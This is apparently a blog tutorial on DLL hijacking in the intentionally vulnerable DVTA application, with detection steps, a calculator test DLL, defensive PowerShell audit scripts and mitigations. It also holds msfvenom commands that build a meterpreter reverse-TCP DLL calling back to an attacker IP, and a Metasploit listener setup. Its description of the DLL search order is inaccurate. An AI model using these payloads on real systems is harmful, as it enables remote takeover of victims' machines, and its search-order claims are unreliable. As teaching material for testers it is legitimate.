Is your executable vulnerable to DLL Hijacking?

Siddhesh
7 min read · Apr 5, 2021


Hello Friends, I am writing this blog as an attempt to help you identify and exploit the DLL Hijacking vulnerability in Windows executables. Kindly note that this blog is purely for educational purposes and I am not responsible for any malicious activity performed by you. Also, to make the attack easier to understand, I have used the Damn Vulnerable Thick Client Application (DVTA) executable, an intentionally vulnerable executable that is great for practice; it can be found here.

Here I am going to cover the below topics for DLL Hijacking.

1. What is Dynamic Link Library (DLL)?

2. What is DLL Hijacking?

3. What should we know about exe before performing the attack and why?

4. How to identify if your executable is vulnerable to DLL Hijacking?

5. How can an attacker exploit it?

6. What is the impact of it?

7. What is the recommendation for it?

So, let’s get started…

What is Dynamic Link Library (DLL)?

A DLL is a library that contains code and data that can be used by more than one program at the same time. For example, in Windows operating systems, the Comdlg32 DLL performs common dialog box related functions. Each program can use the functionality that is contained in this DLL to implement an Open dialog box. It helps promote code reuse and efficient memory usage. Learn more

What is DLL Hijacking?

When we open an executable file in Windows, it looks for the DLLs it requires on the system and loads them. The application's DLL load order is as follows.

· C:\Windows\System32

· C:\Windows\System

· C:\Windows

· The current working directory

· Directories in the system PATH environment variable

· Directories in the user PATH environment variable.

However, when one of these DLLs does not exist on the system, we can force the application to load a malicious DLL of the same name from an earlier directory in this order; this attack is known as DLL hijacking.

What should we know about exe before performing the attack and why?

Before we move ahead with DLL hijacking identification, we need to know the architecture of the application. You can check this on the application's website while downloading it, with sigcheck from the Sysinternals suite, or with CFF Explorer.

Here I will show you how to identify it using the two methods below.

1. Sigcheck

2. CFF Explorer

Method I : Using Sigcheck

1. Extract the Sysinternals suite zip.

2. Now open a command prompt in the same folder and run sigcheck against the executable as shown in the image below.

Method II: Using CFF Explorer

Open CFF Explorer, navigate to File > Open, open DVTA.exe from the file dialog, and under File Type we can see the architecture of the executable.

From the above methods we can conclude that it is a 32-bit executable. Now that we know its architecture, we can move ahead with identifying the DLL hijacking vulnerability.

Why should we know the architecture of exe file?

It is required in order to create a test DLL of the appropriate architecture (in this case 32-bit): a process can only load DLLs built for its own architecture, so a DLL of the wrong architecture will simply fail to load.
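As an added example (not code from the original post or from the DVTA project), the same architecture check can be done without extra tools by reading the PE header directly. This PowerShell function parses the DOS header, follows e_lfanew to the PE signature and reads the COFF Machine and Characteristics fields; the path C:\Tools\DVTA\DVTA.exe in the usage line is an assumed location.

```powershell
# Added example: read the architecture straight from the PE header,
# as an alternative to sigcheck / CFF Explorer. Assumes PowerShell 5+ on Windows.
function Get-PeArchitecture {
    param([Parameter(Mandatory)][string]$Path)

    $bytes = [System.IO.File]::ReadAllBytes($Path)

    # DOS header: 'MZ' magic at offset 0, e_lfanew (offset of the PE header) at 0x3C
    if ($bytes.Length -lt 0x40 -or $bytes[0] -ne 0x4D -or $bytes[1] -ne 0x5A) {
        throw "Not an MZ executable: $Path"
    }
    $peOffset = [BitConverter]::ToInt32($bytes, 0x3C)

    # PE signature 'PE\0\0' (0x00004550 little-endian) followed by the 20-byte COFF file header
    if ($peOffset -lt 0 -or $peOffset + 24 -gt $bytes.Length -or
        [BitConverter]::ToUInt32($bytes, $peOffset) -ne 0x00004550) {
        throw "PE signature not found: $Path"
    }
    $machine         = [BitConverter]::ToUInt16($bytes, $peOffset + 4)   # IMAGE_FILE_HEADER.Machine
    $characteristics = [BitConverter]::ToUInt16($bytes, $peOffset + 22)  # IMAGE_FILE_HEADER.Characteristics

    $arch = switch ($machine) {
        0x014C  { 'x86 (32-bit)' }
        0x8664  { 'x64 (64-bit)' }
        0x01C4  { 'ARM (32-bit, Thumb-2)' }
        0xAA64  { 'ARM64' }
        default { 'Unknown (0x{0:X4})' -f $machine }
    }

    [pscustomobject]@{
        File         = $Path
        Architecture = $arch
        IsDll        = [bool]($characteristics -band 0x2000)   # IMAGE_FILE_DLL flag
    }
}

# Usage (assumed path): run it on the exe and later on your test DLL;
# both must report the same Architecture or the DLL will not load.
Get-PeArchitecture -Path 'C:\Tools\DVTA\DVTA.exe'
```

Running the function on the built test DLL as well is a quick way to catch the classic mistake of building a 64-bit DLL for a 32-bit process: the Architecture values must match and IsDll must be true for the DLL.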

How to find the missing DLL paths in the exe that might be vulnerable to DLL Hijacking?

To identify them we use the Process Monitor (procmon.exe) tool from the Windows Sysinternals suite.

1. Navigate to the Sysinternals suite folder and open Procmon.

2. Apply the filter as shown below, or tweak it further to get more refined results.

3. Now execute the application and we can see many "NAME NOT FOUND" results for registry keys and DLLs. Out of so many missing DLL paths I have selected "DWrite.dll", because choosing the right missing DLL path plays a very important role: it would be very challenging to put a malicious DLL into the C:\Windows directory in a restricted environment. Hence, we have selected a path where placing the DLL is very simple, i.e., the Desktop path.

Now that we have the path where we are going to put the malicious DLL, let's move ahead to identify whether your file is vulnerable to DLL hijacking.
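The selection step above (keep only missing DLL lookups, then prefer directories a normal user can write to) is easy to automate once the Procmon capture is exported as CSV (File > Save, CSV format). The following PowerShell script is an added example, not from the original post or the Procmon tool: it filters the export for CreateFile operations with a NAME NOT FOUND result on a .dll path, and for each directory reports whether it sits under the Windows directory and whether a broad group such as Users or Everyone holds write-type rights on it. The CSV embedded in the script is constructed sample data in Procmon's export layout, not a real capture, and the user name, process and paths in it are made up.

```powershell
# Added example: triage a Procmon CSV export for DLLs that the application looked
# for but did not find, and flag the directories a standard user could write to.
# Assumes Windows PowerShell 5.1 / PowerShell 7 on Windows.

# Constructed sample in Procmon's CSV export layout (not a real capture).
$SampleProcmonCsv = @'
"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:01:02.1","DVTA.exe","4120","RegOpenKey","HKLM\Software\Example","NAME NOT FOUND","Desired Access: Read"
"10:01:02.2","DVTA.exe","4120","CreateFile","C:\Users\alice\Desktop\DVTA\DWrite.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:02.3","DVTA.exe","4120","CreateFile","C:\Windows\System32\DWrite.dll","SUCCESS","Desired Access: Read Data/List Directory"
"10:01:02.4","DVTA.exe","4120","CreateFile","C:\Windows\System32\example.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:02.5","DVTA.exe","4120","CreateFile","C:\Users\alice\Desktop\DVTA\config.xml","NAME NOT FOUND","Desired Access: Generic Read"
'@

function Test-DirectoryWritable {
    # $true if a broad group holds write-type rights on the directory, $false if not,
    # $null if the directory does not exist on this machine.
    param([Parameter(Mandatory)][string]$Directory)
    if (-not (Test-Path -LiteralPath $Directory -PathType Container)) { return $null }
    $broadGroups = 'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE'
    foreach ($ace in (Get-Acl -LiteralPath $Directory).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($broadGroups -notcontains $ace.IdentityReference.Value) { continue }
        # Generic rights show up as bare numbers in this string and are ignored here (conservative).
        if ($ace.FileSystemRights.ToString() -match 'Write|Modify|FullControl|CreateFiles') { return $true }
    }
    return $false
}

function Get-DllHijackCandidates {
    param([Parameter(Mandatory)][string]$CsvText)
    $CsvText | ConvertFrom-Csv |
        Where-Object { $_.Operation -eq 'CreateFile' -and $_.Result -eq 'NAME NOT FOUND' -and $_.Path -like '*.dll' } |
        ForEach-Object {
            $dir = Split-Path -Path $_.Path -Parent
            [pscustomobject]@{
                Process         = $_.'Process Name'
                Dll             = Split-Path -Path $_.Path -Leaf
                Directory       = $dir
                # Paths under the Windows directory normally need admin rights to write to.
                SystemProtected = $dir.StartsWith($env:SystemRoot, [System.StringComparison]::OrdinalIgnoreCase)
                WritableByUsers = Test-DirectoryWritable -Directory $dir
            }
        } | Sort-Object -Property Directory, Dll -Unique
}

# Usage: on the sample data this yields two candidates, DWrite.dll in the Desktop
# folder (not system protected) and example.dll under System32 (system protected).
# For a real capture, pass the exported file: Get-Content -Raw .\Logfile.CSV
Get-DllHijackCandidates -CsvText $SampleProcmonCsv | Format-Table -AutoSize
```

A blank WritableByUsers column means the directory does not exist on the machine running the script (as it will not for the constructed sample); on the machine where the capture was taken, the rows you care about are the ones that are not system protected and show WritableByUsers as True. The ACL check only looks at broad groups, so a directory writable only by one specific account will show False and still deserves a manual look.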

How to identify if your executable is vulnerable to DLL Hijacking?

There are two ways to identify it:

1. Manually creating a DLL

2. Automated scanner

Method 1: By manually creating a DLL

Pre-requisites: Visual Studio

1. Create a new project in Visual Studio and select DLL.

2. Copy and paste the code below and build it in Visual Studio.

Code:

#include "pch.h"        // Visual Studio precompiled header (remove if your project does not use one)
#include <windows.h>

// Harmless proof-of-load payload: launches the calculator.
int maliciousTestDll()
{
    WinExec("calc", 0);
    return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    // Run once, when the DLL is mapped into the process; ignore thread attach/detach.
    if (fdwReason == DLL_PROCESS_ATTACH)
    {
        maliciousTestDll();
    }
    // Returning FALSE from DLL_PROCESS_ATTACH would make the loader fail the load and unmap the DLL.
    return TRUE;
}

What does this newly created DWrite.dll do?

When DWrite.dll gets loaded by any exe, the code built into the DLL pops up the calculator; if the calculator pops up, we can conclude that the exe is vulnerable to DLL hijacking.

3. We can see that the DLL is successfully built.

4. Now copy DWrite.dll to the previously identified path, i.e., the path identified using Procmon.

5. Double-click DVTA.exe and we can see that the DLL is successfully loaded into the exe and the calculator pops up.

Method 2: By using an automated scanner, viz. DLL Hijack Auditor.

This method is not recommended, as it sometimes marks an exe as safe even when it is vulnerable to DLL hijacking.

Please refer to the image for detailed instructions about the usage of this tool.

How can an attacker exploit it?

An attacker can create a malicious DLL, get it onto your system in many ways (most likely via phishing) and gain full control over your system.

As we know that the DLL in the identified path gets executed by the exe, we perform the attack below.

Here I will demonstrate it with two systems.

1. Kali Linux (Attacker)

2. Windows 10 (Victim where DVTA.exe is installed)

Step 1: Create a malicious DLL with msfvenom in Kali Linux

For 32 bit architecture:

msfvenom -p windows/meterpreter/reverse_tcp lhost=<attacker ip> lport=<any port> -f dll > dllname.dll

For 64 bit architecture:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<attacker ip> lport=<any port> -a x64 -f dll > dllname.dll

p: Payload

f: file type (output format)

lhost: listening host

lport: listening port

a: architecture

Now we have successfully built the payload.

Step 2: Now we need to listen for the reverse TCP connection using Metasploit.

1. Open a new terminal and type msfconsole.

2. Type msf> use exploit/multi/handler

3. Set the payload as in the image below.

4. Set the listening host and run the exploit.

Step 3: Place the malicious DLL in the identified path on the victim Windows machine.

Step 4: Double-click and open DVTA.exe. Now we have successfully obtained a reverse shell of the victim system on the Kali attacker machine.

What is the impact of it?

It lets an attacker execute malicious code from a DLL file, which helps them gain access to your computer or network.

What is the recommendation for it?

· Good network practices such as having a strong firewall installed and using intrusion detection systems are a first line of defence.

· Blocking TCP ports 445 and 139 (which are commonly used to compromise computers) is another effective step.

· Making sure that your operating system and applications are up to date and regularly patched ensures that you have the latest defences.

· Enabling SafeDllSearchMode prevents attackers from exploiting the search path.

· Ensure that only signed DLLs are loaded for most system processes and applications.

· In order to avoid DLL hijacking, it is best to write secure code that loads DLLs from a specified path only.
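The SafeDllSearchMode and signed-DLL recommendations above can be audited from PowerShell. The script below is an added example, not from the original post: it reads the SafeDllSearchMode value (and the related CWDIllegalInDllSearch value, which removes the current working directory from the search order when set to 0xFFFFFFFF) from the Session Manager key, and lists every DLL under an application folder whose Authenticode signature is not valid. The folder C:\Tools\DVTA in the usage line is an assumed location.

```powershell
# Added example: audit the DLL search-path hardening settings and the signature
# state of an application's DLLs. Assumes Windows PowerShell 5.1 / PowerShell 7 on Windows.
function Get-DllSearchHardening {
    $key   = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager'
    $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue

    # SafeDllSearchMode: absent or 1 = enabled (the default since Windows XP SP2);
    # 0 = disabled, which moves the current working directory up the search order.
    $safe = $props.SafeDllSearchMode
    $safeState = if ($null -eq $safe)  { 'Enabled (value absent, default)' }
                 elseif ($safe -eq 1)  { 'Enabled (set to 1)' }
                 else                  { "DISABLED (set to $safe)" }

    # CWDIllegalInDllSearch (optional hardening from KB2264107): 0xFFFFFFFF removes the
    # current working directory from the search path entirely; absent means it is still searched.
    $cwd = $props.CWDIllegalInDllSearch
    $cwdState = if ($null -eq $cwd) { 'Not set (CWD is searched)' } else { 'Set to 0x{0:X8}' -f $cwd }

    [pscustomobject]@{
        SafeDllSearchMode     = $safeState
        CWDIllegalInDllSearch = $cwdState
    }
}

function Get-UnsignedDlls {
    # Lists DLLs under $Directory whose Authenticode signature is missing or invalid.
    param([Parameter(Mandatory)][string]$Directory)
    Get-ChildItem -LiteralPath $Directory -Filter *.dll -Recurse -File |
        ForEach-Object {
            $sig = Get-AuthenticodeSignature -FilePath $_.FullName
            [pscustomobject]@{
                Path   = $_.FullName
                Status = $sig.Status          # Valid, NotSigned, HashMismatch, ...
                Signer = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { $null }
            }
        } |
        Where-Object { $_.Status -ne 'Valid' }
}

# Usage (assumed application folder)
Get-DllSearchHardening
Get-UnsignedDlls -Directory 'C:\Tools\DVTA' | Format-Table -AutoSize
```

Treat the signature list as a triage list rather than a verdict: depending on the PowerShell version, DLLs signed only through a Windows catalog file can be reported as NotSigned, and a valid signature on the files that are present says nothing about a DLL the application looks for but never finds, which is the case the Procmon step identifies.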

References:

https://cyware.com/news/dll-hijacking-attacks-what-is-it-and-how-to-stay-protected-5056c0f0

https://blog.finjan.com/best-practices-to-prevent-dll-hijacking/

https://itm4n.github.io/windows-dll-hijacking-clarified/
